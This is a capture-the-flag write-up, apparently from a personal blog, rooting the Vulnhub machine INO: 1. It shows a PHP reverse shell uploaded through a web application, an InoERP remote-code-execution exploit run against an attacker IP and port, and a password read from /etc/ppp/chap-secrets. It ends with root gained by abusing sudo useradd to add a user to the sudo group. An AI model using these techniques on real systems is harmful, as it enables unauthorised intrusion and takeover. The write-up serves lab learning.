Vulnhub - INO: 1
Level: Easy
flags: user, root
Description: This machine require a low skill to get user flag, a little more skill to escalate to root!
Author: foxlox
This is INO: 1 from Vulnhub.
SSH, SMTP (25) and HTTP.
Well, this webserver hated me. Because it’s running fail2ban. Basically it was one run with gobuster or whatever, and then good luck getting it to respond again. Anyway, that was part of the fun I guess :)
The simplest way to a shell here is via /lot/, which is easily found and easily exploited. The exploit doesn’t say what you can do with it, but I uploaded the pentestmonkey PHP reverse shell with the Division List option in the GUI. It was quite happy to take and execute a PHP file, no issues. Yikes.
A quick aside
Google has been flagging the pentestmonkey site as scary and dangerous for a while now, but Chrome flat out refused to download the shell I wanted - there is literally no (obvious) option to tell it that, yes I really do want to download this file. Nope; Google says it’s spooky and you can’t have it.
This wouldn’t have been an issue, except I was working through my Windows host machine rather than Kali, since I’d upset fail2ban on Kali. So I downloaded the file with wget in WSL. Windows Defender promptly nuked it anyway, but at least I had the option to restore it from Defender jail and the nuking didn’t come as a surprise. But Chrome too? Geez.
Back on track
Actually once I’m on the box there is a second web-based option to get a reverse shell. The box is running inoERP in addition to the Lot Reservation Management System. And, inoERP is also exploitable with a python script on searchsploit:
root@kali:/opt/vulnhub/ino# searchsploit -m php/webapps/
Exploit: InoERP 0.7.2 - Remote Code Execution (Unauthenticated)
Path: /usr/share/exploitdb/exploits/php/webapps/
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /opt/vulnhub/ino/
root@kali:/opt/vulnhub/ino# chmod +x
root@kali:/opt/vulnhub/ino# python
specify params in format: python target_url attacker_ip listening_port
root@kali:/opt/vulnhub/ino# python 1235
The only hard part with that would be knowing that the directory exists - ino_enterprise_resource_planning is a heck of a subdirectory name to guess. I haven’t checked if it’s in any of my wordlists but I can’t see why it would be.
On the box
We can find some MySQL creds (lot:lot) and extract a bunch of hashes, many of which we can crack to simple things like admin, admin123 etc. But none of this is useful. I run LinPeas; nothing very useful. We have one obvious target user - ppp. I had to enumerate the box for quite a while before I eventually found the user password; here’s my thinking.
I could see that the box was being worked on during late October - particularly October 27 in the afternoon. I knew I wanted the user ppp. I ran this command:
www-data@ino:/$ find . -ls 2>/dev/null | grep 'Oct 27 18' | cat 2>/dev/null | grep ppp
Which turned up this, amongst some other things:
132449 8 -rw-r–r– 1 root root 4141 Oct 27 18:47 ./var/lib/dpkg/info/ppp.list
I looked in that file, and found there was an /etc/ppp directory, which I hadn’t previously noticed. In there, I found the pot of gold:
<rce_planning/www/modules/sys/form_personalization$ cd /etc/ppp
cd /etc/ppp
www-data@ino:/etc/ppp$ ls -lash
ls -lash
total 68K
4.0K drwxr-xr-x 7 root dip 4.0K Oct 26 16:26 .
4.0K drwxr-xr-x 96 root root 4.0K Dec 5 01:32 ..
4.0K -rw-r--r-- 1 root root 101 Oct 26 16:26 chap-secrets
4.0K -rwxr-xr-x 1 root root 1.8K Feb 20 2020 ip-down
4.0K drwxr-xr-x 2 root root 4.0K Oct 26 16:24 ip-down.d
4.0K -rwxr-xr-x 1 root root 1.9K Feb 20 2020 ip-up
4.0K drwxr-xr-x 2 root root 4.0K Oct 26 16:40 ip-up.d
4.0K -rwxr-xr-x 1 root root 784 Feb 20 2020 ipv6-down
4.0K drwxr-xr-x 2 root root 4.0K Feb 20 2020 ipv6-down.d
4.0K -rwxr-xr-x 1 root root 922 Feb 20 2020 ipv6-up
4.0K drwxr-xr-x 2 root root 4.0K Feb 20 2020 ipv6-up.d
16K -rw-r--r-- 1 root root 13K Feb 20 2020 options
4.0K -rw------- 1 root root 1.6K Oct 26 16:24 pap-secrets
4.0K drwxr-s--- 2 root dip 4.0K Oct 26 16:24 peers
www-data@ino:/etc/ppp$ file chap
file chap-secrets
chap-secrets: ASCII text
www-data@ino:/etc/ppp$ cat ch
cat chap-secrets
# Secrets for authentication using CHAP
# client server secret IP addresses
ppp * ESRxd7856HVJB *
So yes, now we have the password for ppp.
ppp can run useradd as root. I had to check the manpages, but when we add a user we can add them to a group, and specify their password (as returned by crypt) if we want. So the method I used was to add a user called rootpls with the password mrcake to the sudo group. Then since he was in the sudo group, I could do sudo su to become root. Let’s see this in action:
www-data@ino:/$ su ppp
su ppp
Password: ESRxd7856HVJB
ppp@ino:/$ sudo -l
sudo -l
Matching Defaults entries for ppp on ino:
env_reset, mail_badpass,
User ppp may run the following commands on ino:
(root) NOPASSWD: /usr/sbin/useradd *
ppp@ino:/$ sudo -u root /usr/sbin/useradd -g sudo -p WVLY0mgH0RtUI rootpls
sudo -u root /usr/sbin/useradd -g sudo -p WVLY0mgH0RtUI rootpls
ppp@ino:/$ su rootpls
su rootpls
Password: mrcake
$ id
uid=1003(rootpls) gid=27(sudo) groups=27(sudo)
$ sudo su
sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for rootpls: mrcake
root@ino:~# cat proof.txt
cat proof.txt
Not going to lie, I did a little happy dance once I’d rooted this one :)